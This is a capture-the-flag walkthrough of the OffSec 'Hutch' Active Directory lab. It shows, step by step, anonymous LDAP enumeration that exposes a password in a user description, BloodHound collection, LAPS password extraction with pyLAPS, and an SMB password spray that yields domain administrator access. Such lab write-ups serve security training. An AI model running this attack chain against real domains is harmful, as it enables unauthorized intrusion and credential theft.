Hutch

Information Gathering

NMAP - Ports And Services

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/10.0
|   Server Date: Fri, 14 Feb 2025 03:11:55 GMT
|   WebDAV type: Unknown
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-14 03:11:04Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49762/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 1s
| smb2-time: 
|   date: 2025-02-14T03:11:57
|_  start_date: N/A

LDAP

ldapsearch -x -H ldap://192.168.245.122 -s base 
ldapsearch -x -H ldap://192.168.245.122 -s base namingcontexts
ldapsearch -x -H ldap://192.168.245.122 -b "DC=hutch,DC=offsec" '(objectclass=person)'
ldapsearch -x -H ldap://192.168.245.122 -b "DC=hutch,DC=offsec" '(objectclass=user)'



dn: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Freddy McSorley
description: Password set to CrabSharkJellyfish192 at user's request. Please c
 hange on next login.
distinguishedName: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
instanceType: 4
whenCreated: 20201104053505.0Z
whenChanged: 20210216133934.0Z
uSNCreated: 12831
uSNChanged: 49179
name: Freddy McSorley
objectGUID:: TxilGIhMVkuei6KplCd8ug==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132489437036308102
lastLogoff: 0
lastLogon: 132579563744834908
pwdLastSet: 132489417058152751
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnWwQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: fmcsorley
sAMAccountType: 805306368
userPrincipalName: [email protected]



#extact username
┌──(kali㉿kali)-[~/ctf/offsec/hutch]
└─$ ldapsearch -x -H ldap://192.168.245.122 -b "DC=hutch,DC=offsec" '(objectclass=person)' | grep -i samacc | awk -F ": " '{print $2}'
Guest
805306368
rplacidi
805306368
opatry
805306368
ltaunton
805306368
acostello
805306368
jsparwell
805306368
oknee
805306368
jmckendry
805306368
avictoria
805306368
jfrarey
805306368
eaburrow
805306368
cluddy
805306368
agitthouse
805306368
fmcsorley
805306368

got creds : fmcsorley:CrabSharkJellyfish192

Bloodhound

┌──(kali㉿kali)-[~/ctf/offsec/hutch/bloodhound-collection]
└─$ bloodhound-python -d hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 -ns 192.168.245.122 -c all
INFO: Found AD domain: hutch.offsec
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (hutchdc.hutch.offsec:88)] [Errno 111] Connection refused
INFO: Connecting to LDAP server: hutchdc.hutch.offsec
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: hutchdc.hutch.offsec
INFO: Found 18 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: hutchdc.hutch.offsec
INFO: Done in 00M 38S

# ReadLAPSPassword
┌──(kali㉿kali)-[~/…/offsec/hutch/bloodhound-collection/pyLAPS]
└─$ python3 pyLAPS.py --action get -d "hutch.offsec" -u "fmcsorley" -p "CrabSharkJellyfish192" 
                 __    ___    ____  _____
    ____  __  __/ /   /   |  / __ \/ ___/
   / __ \/ / / / /   / /| | / /_/ /\__ \   
  / /_/ / /_/ / /___/ ___ |/ ____/___/ /   
 / .___/\__, /_____/_/  |_/_/    /____/    v1.2
/_/    /____/           @podalirius_           
    
[+] Extracting LAPS passwords of all computers ... 
  | HUTCHDC$             : n)&3#{;q&3pn;X
[+] All done!

Password Spray

┌──(kali㉿kali)-[~/ctf/offsec/hutch]
└─$ nxc smb 192.168.245.122 -u users -p 'n)&3#{;q&3pn;X' --continue-on-success
SMB         192.168.245.122 445    HUTCHDC          [*] Windows 10 / Server 2019 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB         192.168.245.122 445    HUTCHDC          [+] hutch.offsec\administrator:n)&3#{;q&3pn;X (Pwn3d!)

Machine Recap

nmap ports and services scan
ldapsearch and got password in description from fmcsorley
acrive directory mapping using bloodhound
abusing ReadLAPSPassword

PreviousResourced NextUntitled

Last updated 10 months ago